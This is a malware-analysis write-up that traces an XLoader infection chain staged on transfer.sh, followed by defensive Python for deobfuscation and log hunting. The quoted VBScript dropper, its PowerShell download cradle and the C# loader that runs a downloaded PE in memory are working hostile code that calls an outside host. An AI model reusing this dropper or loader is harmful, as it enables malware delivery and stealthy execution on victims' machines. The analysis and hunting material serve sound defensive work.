Malware Delivered Through Free Sharing Tool
File sharing is a classic operation performed by many people on a daily basis. Besides the big players like Dropbox or the *Drive family ("One", "Google", etc.), there are a lot of free alternatives that make it easy to share files with peers. Because, still today, many organizations do not provide an "official" (read: promoted, supported, and monitored) service, users are always looking for alternatives. There are plenty of tools available, like Lufi[1] or transfer.sh[2], among many others. The sample that I spotted yesterday was delivered through the second one.
The initial payload was a gzip'd RAR archive (SHA256: 949ce2559baa5021ac55523ece74c52bcf39b74d94352d9697b60594034c6dfc):
```
remnux@remnux:/MalwareZoo/20220323$ gzip -d -c Files.gz | file -
/dev/stdin: RAR archive data, v5
remnux@remnux:/MalwareZoo/20220323$ gzip -d Files.gz && unrar t Files

UNRAR 5.50 freeware      Copyright (c) 1993-2017 Alexander Roshal

Testing archive Files

Testing     COMPILLED LIST OF ITEMS.vbs                               OK
Testing     Item's Specification & Drawings.vbs                       OK
Testing     Company's Introduction.vbs                                OK
All OK
```
All three files in the archive are the same. Here is the (beautified) code:
```vbscript
KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS = "W"&"s"&"c"&"r"&"i"&CHR(80)&"t."&"s"&"h"&CHR(69)&"l"&"l"
Set HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD = CreateObject(KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS)
SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK = "PoWERsh"
HDFHKFDKHHKDFHKHDFHKK = "E"
GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK = ""+SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK+HDFHKFDKHHKDFHKHDFHKK+"LL -exeC utiO BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG('hxxps://transfer[.]sh/get/z16it2/rraammm.ps1') "
HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD.Run(GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK),0
```
Pretty simple, it fetches the next payload through a share on transfer.sh.
hxxps://transfer[.]sh/get/z16it2/rraammm.ps1
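The string-building tricks in this dropper (literals glued together with & or +, CHR() calls, throw-away variables with random names) can be undone statically. The following Python script is an added example written for this diary, not the sample's own code; it runs against a constructed, shortened stand-in for the dropper with a placeholder URL, resolves the concatenations without executing any VBScript, and then checks the recovered command line for well-known download-cradle indicators once the PowerShell backtick escapes are stripped.

```python
"""Static resolver for VBScript string obfuscation of the kind used by the dropper.

Added example for this write-up (not the sample's code). Nothing is executed: the
script only evaluates string literals, CHR(n) calls and references to variables
that were assigned earlier, which is all the dropper needs to build its command.
"""
import re

# Constructed stand-in for the dropper above: same structure, shorter variable
# names, and a placeholder URL instead of the real one.
SAMPLE_VBS = '''
AAAA = "W"&"s"&"c"&"r"&"i"&CHR(80)&"t."&"s"&"h"&CHR(69)&"l"&"l"
Set OBJ = CreateObject(AAAA)
P1 = "PoWERsh"
P2 = "E"
CMD = ""+P1+P2+"LL -exeC BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG('hxxps://example[.]invalid/stage2.ps1') "
OBJ.Run(CMD),0
'''

TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'   # string literal; a doubled quote is an escaped quote
    r'|CHR\((\d+)\)'      # CHR(n)
    r'|([A-Za-z_]\w*)'    # reference to a previously assigned variable
    r'|([&+])'            # concatenation operator (VBScript accepts both)
    r'|(\s+)',            # whitespace
    re.IGNORECASE,
)

# Indicators of a PowerShell download cradle, matched after de-escaping.
INDICATORS = ("iex", "downloadstring", "net.webclient", "-exec", "bypass")


def eval_expr(expr, env):
    """Evaluate a VBScript string-concatenation expression against env."""
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"unsupported construct at {expr[pos:pos + 20]!r}")
        literal, chr_code, ident, _op, _ws = m.groups()
        if literal is not None:
            out.append(literal.replace('""', '"'))
        elif chr_code is not None:
            out.append(chr(int(chr_code)))
        elif ident is not None:
            if ident not in env:
                raise KeyError(f"unknown identifier {ident}")
            out.append(env[ident])
        # operators and whitespace contribute nothing to the result
        pos = m.end()
    return "".join(out)


def resolve_vbs(script):
    """Walk the script once, resolving every simple string assignment and the
    arguments of CreateObject() and .Run(). Lines that are not plain string
    expressions are skipped rather than guessed at."""
    env, calls = {}, {}
    assign = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
    create = re.compile(r'CreateObject\((.+)\)\s*$', re.IGNORECASE)
    run = re.compile(r'\.Run\((.+?)\)', re.IGNORECASE)
    for line in script.splitlines():
        try:
            m = assign.match(line)
            if m:
                env[m.group(1)] = eval_expr(m.group(2), env)
                continue
            m = create.search(line)
            if m:
                calls["CreateObject"] = eval_expr(m.group(1), env)
            m = run.search(line)
            if m:
                calls["Run"] = eval_expr(m.group(1), env)
        except (ValueError, KeyError):
            pass  # not a resolvable string expression; leave it alone
    return env, calls


def ps_indicators(cmd):
    """Strip PowerShell backtick escapes (i`Ex -> iEx), lowercase, and report
    which download-cradle indicators the command contains."""
    norm = cmd.replace("`", "").lower()
    return [i for i in INDICATORS if i in norm]


if __name__ == "__main__":
    env, calls = resolve_vbs(SAMPLE_VBS)
    print("CreateObject ->", calls.get("CreateObject"))
    print("Run          ->", calls.get("Run"))
    print("indicators   ->", ps_indicators(calls.get("Run", "")))
```

On the constructed sample this recovers `WscriPt.shEll` for the COM object and the full PowerShell command line with its URL; the same approach works on the real dropper once its one-line code is split back into statements.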
The PowerShell code is:
```powershell
$whatever = "dXNpbmcgU3lzd ... (stuff deleted) ... b3NlKCk7fX19";
$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));
Add-Type -TypeDefinition $dec;
$instance = New-Object SKWTFPdZCH.DpGVQhBvSm.HqEHXQYiIxCnIoaXttSHgHoMU;
$instance.HxQcKKablTACrmEGBODiYOGhW();
```
$whatever contains a Base64-encoded C# class, compiled on the fly with Add-Type, that downloads the PE and loads and executes it in memory:
```csharp
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Threading;

namespace SKWTFPdZCH.DpGVQhBvSm
{
    public class HqEHXQYiIxCnIoaXttSHgHoMU
    {
        // Final stage: the PE is, again, hosted on transfer.sh
        private const string VhuixZgiqqTTIkrGvgRwUtDFE = "hxxps://transfer[.]sh/get/ACEDn1/sdr.exe";
        private MemoryStream XaXaVkSGstrUmNTeLpgVnccuS = new MemoryStream();

        [STAThread]
        public void HxQcKKablTACrmEGBODiYOGhW()
        {
            gmrjNtqiFbYCZLoofQZiMGGJt();   // download the PE into the MemoryStream
            imYCaeLWaNVtuIupBojHByURJ();   // load it from memory and call its entry point
        }

        private void imYCaeLWaNVtuIupBojHByURJ()
        {
            byte[] buffer = XaXaVkSGstrUmNTeLpgVnccuS.ToArray();
            Assembly assembly = null;
            // The PE never touches disk: it is handed to the internal nLoadImage method
            if (Environment.Version.Major >= 4)
            {
                MethodInfo method = Type.GetType("System.Reflection.RuntimeAssembly")
                    .GetMethod("nLoadImage", BindingFlags.NonPublic | BindingFlags.Static);
                assembly = (Assembly)method.Invoke(null, new object[] { buffer, null, null, null, false, false, null });
            }
            else
            {
                MethodInfo method = Type.GetType("System.Reflection.Assembly")
                    .GetMethod("nLoadImage", BindingFlags.NonPublic | BindingFlags.Static);
                assembly = (Assembly)method.Invoke(null, new object[] { buffer, null, null, null, false });
            }
            object[] args = new object[1];
            if (assembly.EntryPoint.GetParameters().Length == 0)
                args = null;
            assembly.EntryPoint.Invoke(null, args);
        }

        private void gmrjNtqiFbYCZLoofQZiMGGJt()
        {
            WebRequest request = WebRequest.Create(VhuixZgiqqTTIkrGvgRwUtDFE);
            WebResponse response = request.GetResponse();
            using (Stream web_stream = response.GetResponseStream())
            {
                byte[] buffer = new byte[8192];
                int read = 0;
                while ((read = web_stream.Read(buffer, 0, buffer.Length)) > 0)
                {
                    XaXaVkSGstrUmNTeLpgVnccuS.Write(buffer, 0, read);
                }
            }
            response.Close();
        }
    }
}
```
The final payload (sdr.exe) is again downloaded from transfer.sh. It's an XLoader[3] sample.
It could be interesting to hunt for such file-sharing services in your logs... From a security point of view, Lufi is nice because all encryption and decryption operations are performed on the client side and the server never sees the content of the shared files. However, this prevents files from being downloaded by headless browsers. transfer.sh is pretty simple and is, therefore, a nice solution for attackers! This technique is attractive to them because they don't have to compromise a website to host their malicious content. Note that a Lufi instance could perfectly well be used in a phishing campaign (via a link in the mail).
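One way to run that hunt, as an added example that is not part of the original diary: the Python below parses constructed proxy-log lines in a generic "time source method URL status bytes user-agent" format (adapt the parser to your proxy's real format), flags requests to file-sharing hosts (transfer.sh from the diary plus a placeholder Lufi hostname to replace with the instances you know about), and adds extra reasons when the downloaded filename carries a script or executable extension or when the client sent no User-Agent, which is what the .NET WebClient/WebRequest used in this chain do unless the code sets one. The two transfer.sh paths from the diary are reused as-is; the other URLs and addresses are constructed.

```python
"""Hunt for downloads from free file-sharing services in proxy logs.

Added example for this write-up (not code from the original post). The log
format, IP addresses and most URLs are constructed; the two transfer.sh paths
come from the diary.
"""
import re
from urllib.parse import urlsplit

# Hosts to hunt for: transfer.sh from the diary, plus a placeholder for a Lufi
# instance you would add from your own intelligence or honeypot list.
SHARING_HOSTS = {"transfer.sh", "lufi.example.invalid"}

# File types that deserve a second look when served from a public sharing service.
RISKY_EXT = {".ps1", ".vbs", ".exe", ".dll", ".hta", ".js", ".rar", ".gz"}

# transfer.sh download URLs have the shape /get/<id>/<filename> (as in the diary).
TRANSFER_GET = re.compile(r"^/get/[^/]+/([^/]+)$")

# Constructed sample: "<iso-time> <src-ip> <method> <url> <status> <bytes> <user-agent>"
SAMPLE_LOG = """\
2022-03-23T09:12:01Z 10.1.2.34 GET https://www.example.com/index.html 200 5120 Mozilla/5.0
2022-03-23T09:15:44Z 10.1.2.34 GET https://transfer.sh/get/abc123/Files.gz 200 183040 Mozilla/5.0
2022-03-23T09:16:02Z 10.1.2.34 GET https://transfer.sh/get/z16it2/rraammm.ps1 200 7124 -
2022-03-23T09:16:05Z 10.1.2.34 GET https://transfer.sh/get/ACEDn1/sdr.exe 200 401408 -
2022-03-23T09:20:13Z 10.1.2.57 GET https://lufi.example.invalid/r/Kd9x 200 2048 Mozilla/5.0
2022-03-23T09:21:00Z 10.1.2.99 GET https://cdn.example.net/lib.js 200 90112 Mozilla/5.0
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) (.*)$")


def parse_line(line):
    """Split one log line into a dict, or return None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    ts, src, method, url, status, size, ua = m.groups()
    return {"ts": ts, "src": src, "method": method, "url": url,
            "status": int(status), "bytes": int(size), "ua": ua}


def classify(rec):
    """Return the list of reasons this request is interesting ([] if it is not)."""
    parts = urlsplit(rec["url"])
    host = parts.hostname or ""
    reasons = []
    if host not in SHARING_HOSTS:
        return reasons
    reasons.append(f"file-sharing service {host}")
    m = TRANSFER_GET.match(parts.path)
    filename = m.group(1) if m else parts.path.rsplit("/", 1)[-1]
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in RISKY_EXT:
        reasons.append(f"risky file type {ext}")
    # Assumption: your proxy logs "-" (or nothing) when no User-Agent was sent.
    if rec["ua"] in ("-", ""):
        reasons.append("no User-Agent (non-browser client)")
    return reasons


def hunt(log_text):
    """Return (timestamp, source, url, reasons) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ts"], rec["src"], rec["url"], reasons))
    return hits


if __name__ == "__main__":
    for ts, src, url, reasons in hunt(SAMPLE_LOG):
        print(f"{ts} {src} {url}\n    " + "; ".join(reasons))
```

Against the constructed log this flags the three transfer.sh downloads (two of them with no User-Agent and a script or executable extension, the combination seen in this chain) and the Lufi request, while the ordinary web traffic passes. A single host hitting a sharing service twice within seconds with different file types is a pattern worth alerting on even before the file itself is analysed.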
I'm running my own instance of Lufi as a honeypot and keeping an eye on it but, so far, it has never been abused...
[1] https://framagit.org/fiat-tux/hat-softwares/lufi
[2] https://transfer.sh
[3] https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant